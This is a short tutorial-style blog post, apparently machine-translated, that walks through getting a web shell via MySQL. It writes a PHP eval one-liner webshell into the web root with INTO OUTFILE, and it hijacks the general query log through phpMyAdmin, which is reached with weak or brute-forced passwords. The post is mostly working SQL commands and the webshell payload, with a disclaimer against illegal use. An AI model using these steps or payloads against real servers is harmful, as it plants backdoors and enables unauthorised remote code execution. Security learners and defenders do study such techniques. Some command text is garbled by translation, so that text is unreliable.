(This article is only normal learning record, if any error please chiefs pointed out that if this article can help you that I am also very happy friends)
The article reference https://www.jianshu.com/p/ddd41b841c36 great detail, thanks! ! ! This article merely learning exchanges, illegal use is strictly prohibited! ! !
First, the use into outfile written word Trojan
1. Review the security file global variable priority, if you set this parameter is empty or the specified folder before use
show global variables like ‘%secure-file-prie%’;
- When secure_file_priv is NULL, MySQL allowed limit represents import and export, in order to write such Trojans successful, it is necessary to modify the mysql my.ini file folder secure_file_priv added in [mysqld] inner = ""
select “<?php @eval($_POST[w]);?>” into outfile “/var/www/html/muma.php”
Second, the use PHPMyAdmin log file Getshell
Common log file is divided into: Business (common service) and logging system (Windows or Linux) log
(Note: MySQL version> 5.0 creates a log file, the log file is a global traversal, and can read and write)
- Log PHPMyAdmin, execute SQL statements by weak passwords or blasting way
select @@ datadir; view the data storage location
- Guess the storage location of the source code, D: \ phpstudy_pro \ www
- View log status
show variables like '%general%';
- Turn on logging, and modify the path and file name records
set global general_log='on';
set global general_log_file='F:\\phpStudy_64\\phpstudy_pro\\www\\log.php'
- View log status
show variables like '%general%';
- Trojan written in the file
select "<?php eval($_POST[k]);?>"
- Open log.php file, find the Trojan has been written
-
Browser to access and set the value of k, you can see PHP information, GetShell success
- It can also be used a kitchen knife GetShell